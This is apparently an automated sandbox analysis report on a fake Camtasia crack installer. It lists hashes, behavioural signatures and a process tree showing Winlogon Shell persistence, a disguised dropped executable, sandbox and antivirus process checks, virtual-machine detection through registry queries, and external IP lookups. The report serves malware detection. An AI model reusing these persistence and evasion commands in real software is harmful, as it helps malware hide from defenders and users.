Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
24-08-2023 05:34
Static task
static1
Behavioral task
behavioral1
Sample
auto-reg__Camtasia_22.5.2.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
auto-reg__Camtasia_22.5.2.exe
Resource
win10v2004-20230703-en
General
-
Target
auto-reg__Camtasia_22.5.2.exe
-
Size
14.7MB
-
MD5
2c0d891072da3b262d81a0841ea6a293
-
SHA1
ae9f6bab721045a11524c0fe7982f4f623a8f12d
-
SHA256
f7af93833123166991144fc3d292b79e714e3b96456ead40ef0fbe0897b60286
-
SHA512
88acaacdcc279d8e6c779b30402d691c23413fe26c3a1ff1602de5a8d425299646b3dc74a4610b643c252d74ed3afbcd978f13d42517b6b8f51ffd87094e98cf
-
SSDEEP
393216:6OJVBjqqRCbj41A2H2SlgI+QqkUza2LxASiJ:BF6Ye3mgjkF2SSA
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,Windows Driver Foundation (WDF).exe" reg.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 1000 netsh.exe -
Executes dropped EXE 5 IoCs
pid Process 4172 7z2201.exe 3224 7z.exe 4480 7z.exe 1568 Windows Driver Foundation (WDF).exe 388 WUDNet.exe -
Loads dropped DLL 41 IoCs
pid Process 3224 7z.exe 4480 7z.exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe -
resource yara_rule behavioral2/memory/388-2336-0x0000000000930000-0x0000000000EF1000-memory.dmp upx behavioral2/memory/388-3300-0x0000000000930000-0x0000000000EF1000-memory.dmp upx -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ipinfo.io 6 ipinfo.io 7 ipinfo.io -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\7-Zip\7zG.exe 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\fur.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\mn.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\tr.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\yo.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\mng.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\uk.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\eu.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\hu.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\io.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\it.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\tk.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\lij.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\nl.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\pt.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\ba.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\da.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\7zCon.sfx 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\gu.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\ru.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Uninstall.exe 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\fur.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\sk.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\he.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\cs.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\sq.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\ug.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\uz-cyrl.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\7zG.exe 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\ms.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\uz.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\cy.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\uk.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\ast.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\co.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\7-zip.dll 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\ast.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\nn.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\ps.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\es.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\fi.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\ga.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\hr.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\br.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\cs.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\ug.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\zh-cn.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\mr.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\ta.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\lij.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\7z.sfx 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\sv.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\tt.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\hy.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\readme.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\es.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\sq.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\ta.txt 7z2201.exe File created C:\Program Files (x86)\7-Zip\Lang\bn.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\zh-tw.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\7zFM.exe 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\ga.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\va.txt 7z2201.exe File opened for modification C:\Program Files (x86)\7-Zip\Lang\en.ttt 7z2201.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\QtQuick\Controls.2\Universal\Page.qml 7z.exe File opened for modification C:\Windows\Cache\data8\2\2h0r8a62.d 7z.exe File opened for modification C:\Windows\QtGraphicalEffects\Glow.qmlc 7z.exe File created C:\Windows\QtQuick\Controls.2\TextField.qml 7z.exe File opened for modification C:\Windows\QtQuick\Controls.2\Universal\ToolTip.qmlc 7z.exe File opened for modification C:\Windows\QtQml 7z.exe File opened for modification C:\Windows\QtQuick\Controls.2\Material\CursorDelegate.qmlc 7z.exe File opened for modification C:\Windows\QtQuick\Controls.2\ScrollIndicator.qml 7z.exe File created C:\Windows\QtQuick\Controls\Styles\Desktop\ScrollViewStyle.qml 7z.exe File opened for modification C:\Windows\QtQuick\Controls.2\Universal\SwipeDelegate.qmlc 7z.exe File created C:\Windows\api-ms-win-crt-locale-l1-1-0.dll 7z.exe File opened for modification C:\Windows\QtQuick\Controls.2\RadioDelegate.qml 7z.exe File opened for modification C:\Windows\Qt5Qml.dll 7z.exe File opened for modification C:\Windows\QtQuick\Controls\ToolBar.qml 7z.exe File created C:\Windows\QtQuick\Controls.2\Material\StackView.qmlc 7z.exe File created C:\Windows\QtQuick\Controls.2\Universal\Dial.qmlc 7z.exe File created C:\Windows\QtQuick\Controls.2\Universal\RangeSlider.qml 7z.exe File opened for modification C:\Windows\Cache\data8\2 7z.exe File opened for modification C:\Windows\QtGraphicalEffects\BrightnessContrast.qml 7z.exe File opened for modification C:\Windows\QtGraphicalEffects\MaskedBlur.qmlc 7z.exe File opened for modification C:\Windows\QtQuick\Controls\Label.qml 7z.exe File opened for modification C:\Windows\QtQuick\Controls.2\SwitchIndicator.qml 7z.exe File opened for modification C:\Windows\QtQuick\Dialogs\dialogplugin.dll 7z.exe File created C:\Windows\ssleay32.dll 7z.exe File opened for modification C:\Windows\vcruntime140.dll 7z.exe File created C:\Windows\QtQuick\Controls\Styles\Desktop\qmldir 7z.exe File created C:\Windows\QtQuick\Controls.2\Material\ElevationEffect.qml 7z.exe File created C:\Windows\QtQuick\Controls.2\Material\ToolTip.qml 7z.exe File opened for modification C:\Windows\QtGraphicalEffects\GaussianBlur.qmlc 7z.exe File created C:\Windows\QtQuick\Controls.2\Universal\ToolBar.qmlc 7z.exe File created C:\Windows\QtQuick\Extras\Private\CircularButton.qml 7z.exe File created C:\Windows\QtQuick\Controls\Styles\Base\images\scrollbar-handle-transient.png 7z.exe File created C:\Windows\QtQuick\Controls.2\Universal\RadioDelegate.qml 7z.exe File opened for modification C:\Windows\QtQuick\Extras\PieMenu.qml 7z.exe File created C:\Windows\QtQuick\Extras\ToggleButton.qml 7z.exe File created C:\Windows\QtQuick\Controls.2\Drawer.qml 7z.exe File opened for modification C:\Windows\QtQuick\Controls.2\Material\ToolSeparator.qml 7z.exe File opened for modification C:\Windows\QtQuick\Dialogs\plugins.qmltypes 7z.exe File created C:\Windows\QtQuick\Controls\Styles\Base\TextAreaStyle.qmlc 7z.exe File created C:\Windows\QtQuick\Controls.2\PageIndicator.qmlc 7z.exe File created C:\Windows\QtQuick\Controls.2\Universal\ToolButton.qml 7z.exe File created C:\Windows\Cache\data8\c\2n3f1i7l.d 7z.exe File created C:\Windows\QtGraphicalEffects\Blend.qmlc 7z.exe File opened for modification C:\Windows\QtQuick\Controls\Styles\Base\ScrollViewStyle.qmlc 7z.exe File opened for modification C:\Windows\QtQuick\Controls.2\Material\RoundButton.qmlc 7z.exe File created C:\Windows\QtQuick\Controls.2\Material\SliderHandle.qml 7z.exe File created C:\Windows\QtQuick\Controls.2\Universal\Button.qml 7z.exe File opened for modification C:\Windows\QtQuick\Controls\BusyIndicator.qmlc 7z.exe File created C:\Windows\QtQuick\Controls\Styles\Base\GaugeStyle.qml 7z.exe File opened for modification C:\Windows\QtQuick\Controls.2\AbstractButton.qml 7z.exe File created C:\Windows\QtQuick\Controls\Styles\Desktop\ApplicationWindowStyle.qml 7z.exe File created C:\Windows\QtQuick\Controls.2\Material\CheckIndicator.qml 7z.exe File created C:\Windows\QtQuick\Controls\Private\MenuItemSubControls.qmlc 7z.exe File opened for modification C:\Windows\QtQuick\Controls\Private\TableViewItemDelegateLoader.qmlc 7z.exe File opened for modification C:\Windows\QtQuick\Controls\SpinBox.qmlc 7z.exe File created C:\Windows\QtGraphicalEffects\private\GaussianMaskedBlur.qmlc 7z.exe File created C:\Windows\QtQuick\Controls.2\Universal\CheckBox.qmlc 7z.exe File created C:\Windows\QtQuick\Controls.2\Universal\Menu.qmlc 7z.exe File created C:\Windows\Qt\labs\folderlistmodel\plugins.qmltypes 7z.exe File created C:\Windows\Qt\labs\folderlistmodel\qmldir 7z.exe File created C:\Windows\QtGraphicalEffects\private\GaussianInnerShadow.qmlc 7z.exe File opened for modification C:\Windows\QtGraphicalEffects\private\FastMaskedBlur.qmlc 7z.exe File created C:\Windows\QtQuick\Controls.2\ComboBox.qml 7z.exe File created C:\Windows\QtQuick\Controls.2\Universal\PageIndicator.qmlc 7z.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 3212 timeout.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 1000 tasklist.exe 1980 tasklist.exe 4976 tasklist.exe 3380 tasklist.exe 368 tasklist.exe -
Kills process with taskkill 1 IoCs
pid Process 5060 taskkill.exe -
Modifies registry class 15 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" 7z2201.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip 7z2201.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2201.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} 7z2201.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 7z2201.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 7z2201.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2201.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2201.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip 7z2201.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip 7z2201.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip 7z2201.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2201.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files (x86)\\7-Zip\\7-zip.dll" 7z2201.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip 7z2201.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2201.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1568 Windows Driver Foundation (WDF).exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 936 powershell.exe 936 powershell.exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 368 tasklist.exe Token: SeDebugPrivilege 1000 tasklist.exe Token: SeDebugPrivilege 1980 tasklist.exe Token: SeIncreaseQuotaPrivilege 2580 WMIC.exe Token: SeSecurityPrivilege 2580 WMIC.exe Token: SeTakeOwnershipPrivilege 2580 WMIC.exe Token: SeLoadDriverPrivilege 2580 WMIC.exe Token: SeSystemProfilePrivilege 2580 WMIC.exe Token: SeSystemtimePrivilege 2580 WMIC.exe Token: SeProfSingleProcessPrivilege 2580 WMIC.exe Token: SeIncBasePriorityPrivilege 2580 WMIC.exe Token: SeCreatePagefilePrivilege 2580 WMIC.exe Token: SeBackupPrivilege 2580 WMIC.exe Token: SeRestorePrivilege 2580 WMIC.exe Token: SeShutdownPrivilege 2580 WMIC.exe Token: SeDebugPrivilege 2580 WMIC.exe Token: SeSystemEnvironmentPrivilege 2580 WMIC.exe Token: SeRemoteShutdownPrivilege 2580 WMIC.exe Token: SeUndockPrivilege 2580 WMIC.exe Token: SeManageVolumePrivilege 2580 WMIC.exe Token: 33 2580 WMIC.exe Token: 34 2580 WMIC.exe Token: 35 2580 WMIC.exe Token: 36 2580 WMIC.exe Token: SeIncreaseQuotaPrivilege 2580 WMIC.exe Token: SeSecurityPrivilege 2580 WMIC.exe Token: SeTakeOwnershipPrivilege 2580 WMIC.exe Token: SeLoadDriverPrivilege 2580 WMIC.exe Token: SeSystemProfilePrivilege 2580 WMIC.exe Token: SeSystemtimePrivilege 2580 WMIC.exe Token: SeProfSingleProcessPrivilege 2580 WMIC.exe Token: SeIncBasePriorityPrivilege 2580 WMIC.exe Token: SeCreatePagefilePrivilege 2580 WMIC.exe Token: SeBackupPrivilege 2580 WMIC.exe Token: SeRestorePrivilege 2580 WMIC.exe Token: SeShutdownPrivilege 2580 WMIC.exe Token: SeDebugPrivilege 2580 WMIC.exe Token: SeSystemEnvironmentPrivilege 2580 WMIC.exe Token: SeRemoteShutdownPrivilege 2580 WMIC.exe Token: SeUndockPrivilege 2580 WMIC.exe Token: SeManageVolumePrivilege 2580 WMIC.exe Token: 33 2580 WMIC.exe Token: 34 2580 WMIC.exe Token: 35 2580 WMIC.exe Token: 36 2580 WMIC.exe Token: SeIncreaseQuotaPrivilege 3204 WMIC.exe Token: SeSecurityPrivilege 3204 WMIC.exe Token: SeTakeOwnershipPrivilege 3204 WMIC.exe Token: SeLoadDriverPrivilege 3204 WMIC.exe Token: SeSystemProfilePrivilege 3204 WMIC.exe Token: SeSystemtimePrivilege 3204 WMIC.exe Token: SeProfSingleProcessPrivilege 3204 WMIC.exe Token: SeIncBasePriorityPrivilege 3204 WMIC.exe Token: SeCreatePagefilePrivilege 3204 WMIC.exe Token: SeBackupPrivilege 3204 WMIC.exe Token: SeRestorePrivilege 3204 WMIC.exe Token: SeShutdownPrivilege 3204 WMIC.exe Token: SeDebugPrivilege 3204 WMIC.exe Token: SeSystemEnvironmentPrivilege 3204 WMIC.exe Token: SeRemoteShutdownPrivilege 3204 WMIC.exe Token: SeUndockPrivilege 3204 WMIC.exe Token: SeManageVolumePrivilege 3204 WMIC.exe Token: 33 3204 WMIC.exe Token: 34 3204 WMIC.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe 1568 Windows Driver Foundation (WDF).exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1760 wrote to memory of 1148 1760 auto-reg__Camtasia_22.5.2.exe 83 PID 1760 wrote to memory of 1148 1760 auto-reg__Camtasia_22.5.2.exe 83 PID 1148 wrote to memory of 4172 1148 cmd.exe 85 PID 1148 wrote to memory of 4172 1148 cmd.exe 85 PID 1148 wrote to memory of 4172 1148 cmd.exe 85 PID 1148 wrote to memory of 4016 1148 cmd.exe 86 PID 1148 wrote to memory of 4016 1148 cmd.exe 86 PID 1148 wrote to memory of 1828 1148 cmd.exe 87 PID 1148 wrote to memory of 1828 1148 cmd.exe 87 PID 1148 wrote to memory of 4608 1148 cmd.exe 88 PID 1148 wrote to memory of 4608 1148 cmd.exe 88 PID 1148 wrote to memory of 3780 1148 cmd.exe 89 PID 1148 wrote to memory of 3780 1148 cmd.exe 89 PID 3780 wrote to memory of 368 3780 cmd.exe 90 PID 3780 wrote to memory of 368 3780 cmd.exe 90 PID 1148 wrote to memory of 3652 1148 cmd.exe 92 PID 1148 wrote to memory of 3652 1148 cmd.exe 92 PID 1148 wrote to memory of 3700 1148 cmd.exe 93 PID 1148 wrote to memory of 3700 1148 cmd.exe 93 PID 1148 wrote to memory of 2124 1148 cmd.exe 94 PID 1148 wrote to memory of 2124 1148 cmd.exe 94 PID 2124 wrote to memory of 3060 2124 cmd.exe 95 PID 2124 wrote to memory of 3060 2124 cmd.exe 95 PID 1148 wrote to memory of 3628 1148 cmd.exe 96 PID 1148 wrote to memory of 3628 1148 cmd.exe 96 PID 3628 wrote to memory of 4260 3628 cmd.exe 97 PID 3628 wrote to memory of 4260 3628 cmd.exe 97 PID 1148 wrote to memory of 4572 1148 cmd.exe 98 PID 1148 wrote to memory of 4572 1148 cmd.exe 98 PID 4572 wrote to memory of 1000 4572 cmd.exe 99 PID 4572 wrote to memory of 1000 4572 cmd.exe 99 PID 1148 wrote to memory of 3672 1148 cmd.exe 100 PID 1148 wrote to memory of 3672 1148 cmd.exe 100 PID 3672 wrote to memory of 1980 3672 cmd.exe 101 PID 3672 wrote to memory of 1980 3672 cmd.exe 101 PID 1148 wrote to memory of 1924 1148 cmd.exe 102 PID 1148 wrote to memory of 1924 1148 cmd.exe 102 PID 1924 wrote to memory of 2580 1924 cmd.exe 103 PID 1924 wrote to memory of 2580 1924 cmd.exe 103 PID 1148 wrote to memory of 1972 1148 cmd.exe 104 PID 1148 wrote to memory of 1972 1148 cmd.exe 104 PID 1972 wrote to memory of 4032 1972 cmd.exe 105 PID 1972 wrote to memory of 4032 1972 cmd.exe 105 PID 1148 wrote to memory of 3328 1148 cmd.exe 106 PID 1148 wrote to memory of 3328 1148 cmd.exe 106 PID 3328 wrote to memory of 1120 3328 cmd.exe 107 PID 3328 wrote to memory of 1120 3328 cmd.exe 107 PID 1148 wrote to memory of 3204 1148 cmd.exe 108 PID 1148 wrote to memory of 3204 1148 cmd.exe 108 PID 1148 wrote to memory of 3124 1148 cmd.exe 109 PID 1148 wrote to memory of 3124 1148 cmd.exe 109 PID 3124 wrote to memory of 4904 3124 cmd.exe 110 PID 3124 wrote to memory of 4904 3124 cmd.exe 110 PID 1148 wrote to memory of 1732 1148 cmd.exe 111 PID 1148 wrote to memory of 1732 1148 cmd.exe 111 PID 1148 wrote to memory of 4036 1148 cmd.exe 112 PID 1148 wrote to memory of 4036 1148 cmd.exe 112 PID 4036 wrote to memory of 1412 4036 cmd.exe 113 PID 4036 wrote to memory of 1412 4036 cmd.exe 113 PID 1148 wrote to memory of 4180 1148 cmd.exe 114 PID 1148 wrote to memory of 4180 1148 cmd.exe 114 PID 1148 wrote to memory of 2560 1148 cmd.exe 115 PID 1148 wrote to memory of 2560 1148 cmd.exe 115 PID 2560 wrote to memory of 4852 2560 cmd.exe 116 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4616 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\auto-reg__Camtasia_22.5.2.exe"C:\Users\Admin\AppData\Local\Temp\auto-reg__Camtasia_22.5.2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0Q3PBYE5.bat" "C:\Users\Admin\AppData\Local\Temp\auto-reg__Camtasia_22.5.2.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\qbE57A95F.C2\7z2201.exe"C:\Users\Admin\AppData\Local\Temp\qbE57A95F.C2\7z2201.exe" /S3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
PID:4172
-
-
C:\Windows\system32\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Temp\qbE57A95F.C2\P" "C:\Program Files\TechSmith\Camtasia 2022" /S /E /Y /R3⤵PID:4016
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo ------ Camtasia successfully registered! ------ "3⤵PID:1828
-
-
C:\Windows\system32\msg.exemsg *3⤵PID:4608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /fi "imagename eq SbieSvc.exe" /fo csv /nh3⤵
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\system32\tasklist.exetasklist /fi "imagename eq SbieSvc.exe" /fo csv /nh4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
-
C:\Windows\system32\reg.exeReg query "HKLM\SOFTWARE\Microsoft\Alu" /s /reg:323⤵PID:3652
-
-
C:\Windows\system32\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Alu" /f /reg:323⤵PID:3700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"3⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"4⤵PID:3060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"3⤵
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"4⤵PID:4260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /fi "imagename eq ekrn.exe" /fo csv /nh3⤵
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\system32\tasklist.exetasklist /fi "imagename eq ekrn.exe" /fo csv /nh4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /fi "imagename eq QHActiveDefense.exe" /fo csv /nh3⤵
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\system32\tasklist.exetasklist /fi "imagename eq QHActiveDefense.exe" /fo csv /nh4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_LocalTime Get Day,Month,Year /value3⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_LocalTime Get Day,Month,Year /value4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://ipinfo.io/ip -k3⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\system32\curl.execurl https://ipinfo.io/ip -k4⤵PID:4032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://ipinfo.io/country -k3⤵
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\system32\curl.execurl https://ipinfo.io/country -k4⤵PID:1120
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic os get caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ( findstr /ilc:"Windows 7" 1>nul )"3⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\system32\findstr.exefindstr /ilc:"Windows 7"4⤵PID:4904
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic os get caption3⤵PID:1732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ( findstr /ilc:"Windows 8" 1>nul )"3⤵
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\system32\findstr.exefindstr /ilc:"Windows 8"4⤵PID:1412
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic os get caption3⤵PID:4180
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ( findstr /ilc:"Windows 8.1" 1>nul )"3⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\system32\findstr.exefindstr /ilc:"Windows 8.1"4⤵PID:4852
-
-
-
